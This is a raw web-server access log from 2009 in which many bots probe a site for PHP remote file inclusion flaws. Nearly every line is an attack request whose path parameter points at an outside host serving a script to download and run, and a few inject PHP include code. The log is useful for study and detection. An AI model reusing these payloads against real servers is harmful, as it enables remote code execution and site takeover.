222.236.221.38 - - [13/Nov/2009:04:27:03 -0500] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
222.236.221.38 - - [13/Nov/2009:04:28:40 -0500] "GET /logs/access_log.Q109061800%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
209.97.212.185 - - [13/Nov/2009:04:29:24 -0500] "GET //index.php?DOCUMENT_ROOT=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
209.97.212.185 - - [13/Nov/2009:04:29:24 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
209.97.212.185 - - [13/Nov/2009:04:29:24 -0500] "GET /logs/access_log.Q109092200//index.php?DOCUMENT_ROOT=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.97.212.185 - - [13/Nov/2009:04:29:55 -0500] "GET /logs/access_log.Q109061700//index.php?DOCUMENT_ROOT=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
201.218.228.226 - - [13/Nov/2009:04:30:24 -0500] "GET //index.php?DOCUMENT_ROOT=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
201.218.228.226 - - [13/Nov/2009:04:30:24 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
201.218.228.226 - - [13/Nov/2009:04:30:25 -0500] "GET //index.php?DOCUMENT_ROOT=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
201.218.228.226 - - [13/Nov/2009:04:30:25 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
201.218.228.226 - - [13/Nov/2009:04:30:25 -0500] "GET /logs/access_log.Q109092200%20%20//index.php?DOCUMENT_ROOT=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
201.218.228.226 - - [13/Nov/2009:04:30:27 -0500] "GET /logs/access_log.Q109092200//index.php?DOCUMENT_ROOT=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
201.218.228.226 - - [13/Nov/2009:04:31:18 -0500] "GET /logs/access_log.Q109061700//index.php?DOCUMENT_ROOT=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
201.218.228.226 - - [13/Nov/2009:04:32:05 -0500] "GET /logs/access_log.Q109092200//index.php?DOCUMENT_ROOT=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.97.212.185 - - [13/Nov/2009:04:32:40 -0500] "GET /logs/access_log.Q109092200%20%20//index.php?DOCUMENT_ROOT=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.97.212.185 - - [13/Nov/2009:04:33:07 -0500] "GET /logs/access_log.Q109061700%20%20//index.php?DOCUMENT_ROOT=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:04:35:18 -0500] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:04:35:18 -0500] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
85.25.94.14 - - [13/Nov/2009:04:35:26 -0500] "GET /logs/access_log.Q109063000%20//myfunctions/mygallerybrowser.php?myPath=http://videochatbuilder.com/id3.txt?? HTTP/1.1" 404 259 "-" "libwww-perl/5.803"
85.25.94.14 - - [13/Nov/2009:04:35:32 -0500] "GET /logs/access_log.Q109062300%20//myfunctions/mygallerybrowser.php?myPath=http://videochatbuilder.com/id3.txt?? HTTP/1.1" 404 259 "-" "libwww-perl/5.803"
201.218.228.226 - - [13/Nov/2009:04:36:24 -0500] "GET /logs/access_log.Q109092200%20%20//index.php?DOCUMENT_ROOT=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
201.218.228.226 - - [13/Nov/2009:04:37:04 -0500] "GET /logs/access_log.Q109061700%20%20//index.php?DOCUMENT_ROOT=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:04:37:11 -0500] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:04:37:11 -0500] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:04:38:21 -0500] "GET /logs//pollphp/db//booth.php?include_path=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:04:38:21 -0500] "GET //pollphp/db//booth.php?include_path=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:04:38:22 -0500] "GET /logs/access_log.Q109051800//pollphp/db//booth.php?include_path=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:04:38:22 -0500] "GET //pollphp/db//booth.php?include_path=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:04:38:22 -0500] "GET /logs//pollphp/db//booth.php?include_path=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:04:38:22 -0500] "GET /logs/access_log.Q109051800//pollphp/db//booth.php?include_path=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:04:38:27 -0500] "GET //pollphp/db//booth.php?include_path=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:04:38:27 -0500] "GET /logs/access_log.Q109051800%20%20//pollphp/db//booth.php?include_path=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:04:38:27 -0500] "GET /logs//pollphp/db//booth.php?include_path=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:04:38:28 -0500] "GET //pollphp/db//booth.php?include_path=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:04:38:28 -0500] "GET /logs//pollphp/db//booth.php?include_path=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:04:38:28 -0500] "GET /logs/access_log.Q109051800%20%20//pollphp/db//booth.php?include_path=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
124.247.200.12 - - [13/Nov/2009:04:38:39 -0500] "GET /?seccion=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
124.247.200.12 - - [13/Nov/2009:04:38:39 -0500] "GET /logs/error_log.Q109101400%20%20/?seccion=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
124.247.200.12 - - [13/Nov/2009:04:38:39 -0500] "GET /logs/?seccion=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 200 25806 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:04:38:45 -0500] "GET /logs/access_log.Q109081400//pollphp/db//booth.php?include_path=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:04:38:46 -0500] "GET /logs/access_log.Q109081400//pollphp/db//booth.php?include_path=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
124.247.200.12 - - [13/Nov/2009:04:38:47 -0500] "GET /logs/error_log.Q109100600%20%20/?seccion=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:04:38:51 -0500] "GET /logs/access_log.Q109081400%20%20//pollphp/db//booth.php?include_path=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:04:38:51 -0500] "GET /logs/access_log.Q109081400%20%20//pollphp/db//booth.php?include_path=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
209.59.12.99 - - [13/Nov/2009:04:42:07 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
213.3.26.176 - - [13/Nov/2009:04:42:18 -0500] "GET //administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
213.3.26.176 - - [13/Nov/2009:04:42:18 -0500] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
213.3.26.176 - - [13/Nov/2009:04:42:18 -0500] "GET /logs/access_log.Q109090900//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
213.3.26.176 - - [13/Nov/2009:04:42:22 -0500] "GET /logs/access_log.Q109082800//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
66.34.10.1 - - [13/Nov/2009:04:44:34 -0500] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://oxigent.fileave.com/azka.txt?? HTTP/1.0" 404 255 "-" "Mozilla/5.0"
66.34.10.1 - - [13/Nov/2009:04:44:34 -0500] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://oxigent.fileave.com/azka.txt?? HTTP/1.0" 404 260 "-" "Mozilla/5.0"
66.34.10.1 - - [13/Nov/2009:04:44:34 -0500] "GET /logs/access_log.Q109061400/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://oxigent.fileave.com/azka.txt?? HTTP/1.0" 404 282 "-" "Mozilla/5.0"
66.34.10.1 - - [13/Nov/2009:04:44:54 -0500] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://oxigent.fileave.com/azka.txt?? HTTP/1.0" 404 255 "-" "Mozilla/5.0"
66.34.10.1 - - [13/Nov/2009:04:44:54 -0500] "GET /logs/access_log.Q109061400%20%20/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://oxigent.fileave.com/azka.txt?? HTTP/1.0" 404 284 "-" "Mozilla/5.0"
66.34.10.1 - - [13/Nov/2009:04:44:58 -0500] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://oxigent.fileave.com/azka.txt?? HTTP/1.0" 404 260 "-" "Mozilla/5.0"
70.38.112.174 - - [13/Nov/2009:04:45:54 -0500] "GET //OLE.php?mosConfig_absolute_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
70.38.112.174 - - [13/Nov/2009:04:45:54 -0500] "GET /logs//OLE.php?mosConfig_absolute_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
70.38.112.174 - - [13/Nov/2009:04:45:54 -0500] "GET /logs/access_log.Q109072200//OLE.php?mosConfig_absolute_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
70.38.112.174 - - [13/Nov/2009:04:45:58 -0500] "GET /logs/access_log.Q109071500//OLE.php?mosConfig_absolute_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
78.138.3.238 - - [13/Nov/2009:04:40:31 -0500] "GET /logs/access_log.Q109101500 HTTP/1.1" 200 4475657 "http://search.yahoo.com/search;_ylt=A0geu5oKIf1KRoQBtrFXNyoA?p=%2B61+%40yahoo.com.au+-scam419mails+txt+2009&fr2=sb-top&n=100&vm=p&vf=txt&vs=&vd=m3&sao=0" "Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.01"
93.174.0.17 - - [13/Nov/2009:04:46:29 -0500] "GET /logs/access_log.Q109072200%20%20//OLE.php?mosConfig_absolute_path=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
93.174.0.17 - - [13/Nov/2009:04:46:29 -0500] "GET //OLE.php?mosConfig_absolute_path=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
93.174.0.17 - - [13/Nov/2009:04:46:31 -0500] "GET /logs//OLE.php?mosConfig_absolute_path=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
66.34.10.1 - - [13/Nov/2009:04:46:41 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://oxigent.fileave.com/azka.txt?? HTTP/1.0" 404 258 "-" "Mozilla/5.0"
66.34.10.1 - - [13/Nov/2009:04:46:41 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://oxigent.fileave.com/azka.txt?? HTTP/1.0" 404 263 "-" "Mozilla/5.0"
66.34.10.1 - - [13/Nov/2009:04:46:41 -0500] "GET /logs/error_log.Q109080200/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://oxigent.fileave.com/azka.txt?? HTTP/1.0" 404 284 "-" "Mozilla/5.0"
93.174.0.17 - - [13/Nov/2009:04:46:43 -0500] "GET /logs/access_log.Q109071500%20%20//OLE.php?mosConfig_absolute_path=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
66.34.10.1 - - [13/Nov/2009:04:47:13 -0500] "GET /logs/access_log.Q109080200/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://oxigent.fileave.com/azka.txt?? HTTP/1.0" 404 285 "-" "Mozilla/5.0"
70.38.112.174 - - [13/Nov/2009:04:47:39 -0500] "GET /logs/access_log.Q109072200%20%20//OLE.php?mosConfig_absolute_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
124.247.200.12 - - [13/Nov/2009:04:47:39 -0500] "GET /logs/error_log.Q109101400/?seccion=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
124.247.200.12 - - [13/Nov/2009:04:47:39 -0500] "GET /logs/access_log.Q109091500/?seccion=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
70.38.112.174 - - [13/Nov/2009:04:47:41 -0500] "GET /logs/access_log.Q109071500%20%20//OLE.php?mosConfig_absolute_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
66.34.10.1 - - [13/Nov/2009:04:47:55 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://oxigent.fileave.com/azka.txt?? HTTP/1.0" 404 258 "-" "Mozilla/5.0"
66.34.10.1 - - [13/Nov/2009:04:47:55 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://oxigent.fileave.com/azka.txt?? HTTP/1.0" 404 263 "-" "Mozilla/5.0"
66.34.10.1 - - [13/Nov/2009:04:47:55 -0500] "GET /logs/error_log.Q109080200%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://oxigent.fileave.com/azka.txt?? HTTP/1.0" 404 286 "-" "Mozilla/5.0"
66.34.10.1 - - [13/Nov/2009:04:48:16 -0500] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://oxigent.fileave.com/azka.txt?? HTTP/1.0" 404 255 "-" "Mozilla/5.0"
66.34.10.1 - - [13/Nov/2009:04:48:16 -0500] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://oxigent.fileave.com/azka.txt?? HTTP/1.0" 404 260 "-" "Mozilla/5.0"
66.34.10.1 - - [13/Nov/2009:04:48:16 -0500] "GET /logs/error_log.Q109091000/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://oxigent.fileave.com/azka.txt?? HTTP/1.0" 404 281 "-" "Mozilla/5.0"
74.86.17.106 - - [13/Nov/2009:04:48:26 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.qqe.ru/forum/Themes/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
74.86.17.106 - - [13/Nov/2009:04:48:27 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.qqe.ru/forum/Themes/id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
74.86.17.106 - - [13/Nov/2009:04:48:27 -0500] "GET /logs/access_log.Q109082800///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.qqe.ru/forum/Themes/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
74.86.17.106 - - [13/Nov/2009:04:48:27 -0500] "GET /logs/access_log.Q109082500///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.qqe.ru/forum/Themes/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
66.34.10.1 - - [13/Nov/2009:04:48:40 -0500] "GET /logs/error_log.Q109061400/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://oxigent.fileave.com/azka.txt?? HTTP/1.0" 404 281 "-" "Mozilla/5.0"
66.34.10.1 - - [13/Nov/2009:04:49:55 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://oxigent.fileave.com/azka.txt?? HTTP/1.0" 404 258 "-" "Mozilla/5.0"
66.34.10.1 - - [13/Nov/2009:04:49:55 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://oxigent.fileave.com/azka.txt?? HTTP/1.0" 404 263 "-" "Mozilla/5.0"
66.34.10.1 - - [13/Nov/2009:04:49:55 -0500] "GET /logs/access_log.Q109080200/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://oxigent.fileave.com/azka.txt?? HTTP/1.0" 404 285 "-" "Mozilla/5.0"
66.34.10.1 - - [13/Nov/2009:04:50:11 -0500] "GET /logs/access_log.Q109080200%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://oxigent.fileave.com/azka.txt?? HTTP/1.0" 404 287 "-" "Mozilla/5.0"
213.171.225.234 - - [13/Nov/2009:04:50:44 -0500] "GET ///?_zb_path=http://www.abruzzobooking.it/mambots/idxx.txt?%20? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
213.171.225.234 - - [13/Nov/2009:04:50:44 -0500] "GET /logs/access_log.Q109102300///?_zb_path=http://www.abruzzobooking.it/mambots/idxx.txt?%20? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
213.171.225.234 - - [13/Nov/2009:04:50:44 -0500] "GET /logs///?_zb_path=http://www.abruzzobooking.it/mambots/idxx.txt?%20? HTTP/1.1" 200 25812 "-" "Mozilla/5.0"
213.171.225.234 - - [13/Nov/2009:04:51:10 -0500] "GET ///?_zb_path=http://www.abruzzobooking.it/mambots/idxx.txt?%20? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
213.171.225.234 - - [13/Nov/2009:04:51:10 -0500] "GET /logs///?_zb_path=http://www.abruzzobooking.it/mambots/idxx.txt?%20? HTTP/1.1" 200 25812 "-" "Mozilla/5.0"
213.171.225.234 - - [13/Nov/2009:04:51:13 -0500] "GET /logs/access_log.Q109102300///?_zb_path=http://www.abruzzobooking.it/mambots/idxx.txt?%20? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
213.3.26.176 - - [13/Nov/2009:04:51:14 -0500] "GET ////skin/ggambo7002_board/comment_modify.php?dir=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
213.3.26.176 - - [13/Nov/2009:04:51:18 -0500] "GET /logs/access_log.Q109100400%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
213.171.225.234 - - [13/Nov/2009:04:53:03 -0500] "GET /logs/access_log.Q109051300///?_zb_path=http://www.abruzzobooking.it/mambots/idxx.txt?%20? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
213.3.26.176 - - [13/Nov/2009:04:54:10 -0500] "GET /logs/access_log.Q109100400////skin/ggambo7002_board/comment_modify.php?dir=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
93.182.32.70 - - [13/Nov/2009:04:54:46 -0500] "GET /logs/write.php?dir=http://nuhalka.ru/senux/id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
93.182.32.70 - - [13/Nov/2009:04:54:47 -0500] "GET /logs/error_log.Q109092500/write.php?dir=http://nuhalka.ru/senux/id1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
93.182.32.70 - - [13/Nov/2009:04:54:47 -0500] "GET /write.php?dir=http://nuhalka.ru/senux/id1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
213.171.225.234 - - [13/Nov/2009:04:54:47 -0500] "GET /logs/access_log.Q109051300///?_zb_path=http://www.abruzzobooking.it/mambots/idxx.txt?%20? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
74.86.17.106 - - [13/Nov/2009:04:56:06 -0500] "GET /logs/access_log.Q109082800%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.qqe.ru/forum/Themes/id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
74.86.17.106 - - [13/Nov/2009:04:56:06 -0500] "GET /logs/access_log.Q109082500%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.qqe.ru/forum/Themes/id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
64.8.105.21 - - [13/Nov/2009:04:56:20 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.atdreamholiday.com//smf/Themes/fx1.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
64.8.105.21 - - [13/Nov/2009:04:56:20 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.atdreamholiday.com//smf/Themes/fx1.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
64.8.105.21 - - [13/Nov/2009:04:56:20 -0500] "GET /logs/access_log.Q109091800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.atdreamholiday.com//smf/Themes/fx1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
64.8.105.21 - - [13/Nov/2009:04:56:20 -0500] "GET /logs/access_log.Q109092200//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.atdreamholiday.com//smf/Themes/fx1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
70.38.112.174 - - [13/Nov/2009:04:56:26 -0500] "GET /logs/access_log.Q109052900//OLE.php?mosConfig_absolute_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
64.8.105.21 - - [13/Nov/2009:04:59:49 -0500] "GET /logs/access_log.Q109092200%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.atdreamholiday.com//smf/Themes/fx1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
64.8.105.21 - - [13/Nov/2009:04:59:49 -0500] "GET /logs/access_log.Q109091800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.atdreamholiday.com//smf/Themes/fx1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
70.38.112.174 - - [13/Nov/2009:05:00:09 -0500] "GET //OLE.php?mosConfig_absolute_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
70.38.112.174 - - [13/Nov/2009:05:00:09 -0500] "GET /logs//OLE.php?mosConfig_absolute_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
66.34.10.1 - - [13/Nov/2009:05:01:45 -0500] "GET /port.php?content=http://oxigent.fileave.com/azka.txt?? HTTP/1.0" 404 206 "-" "Mozilla/5.0"
66.34.10.1 - - [13/Nov/2009:05:01:45 -0500] "GET /logs/port.php?content=http://oxigent.fileave.com/azka.txt?? HTTP/1.0" 404 211 "-" "Mozilla/5.0"
66.34.10.1 - - [13/Nov/2009:05:01:45 -0500] "GET /logs/access_log.Q109060600/port.php?content=http://oxigent.fileave.com/azka.txt?? HTTP/1.0" 404 233 "-" "Mozilla/5.0"
66.34.10.1 - - [13/Nov/2009:05:01:51 -0500] "GET /logs/access_log.Q109060600%20%20/port.php?content=http://oxigent.fileave.com/azka.txt?? HTTP/1.0" 404 235 "-" "Mozilla/5.0"
66.34.10.1 - - [13/Nov/2009:05:01:51 -0500] "GET /port.php?content=http://oxigent.fileave.com/azka.txt?? HTTP/1.0" 404 206 "-" "Mozilla/5.0"
66.34.10.1 - - [13/Nov/2009:05:01:51 -0500] "GET /logs/port.php?content=http://oxigent.fileave.com/azka.txt?? HTTP/1.0" 404 211 "-" "Mozilla/5.0"
93.174.0.17 - - [13/Nov/2009:05:01:52 -0500] "GET /logs/access_log.Q109052900//OLE.php?mosConfig_absolute_path=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
93.174.0.17 - - [13/Nov/2009:05:02:08 -0500] "GET /logs/access_log.Q109072200//OLE.php?mosConfig_absolute_path=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
209.59.12.99 - - [13/Nov/2009:05:02:28 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
222.236.221.38 - - [13/Nov/2009:05:02:45 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
222.236.221.38 - - [13/Nov/2009:05:02:45 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
222.236.221.38 - - [13/Nov/2009:05:02:45 -0500] "GET /logs/access_log.Q109062000//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
222.236.221.38 - - [13/Nov/2009:05:03:07 -0500] "GET /logs/access_log.Q109053100//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
66.34.10.1 - - [13/Nov/2009:05:03:24 -0500] "GET /logs/access_log.Q109091000/port.php?content=http://oxigent.fileave.com/azka.txt?? HTTP/1.0" 404 233 "-" "Mozilla/5.0"
66.34.10.1 - - [13/Nov/2009:05:03:32 -0500] "GET /logs/access_log.Q109091000%20%20/port.php?content=http://oxigent.fileave.com/azka.txt?? HTTP/1.0" 404 235 "-" "Mozilla/5.0"
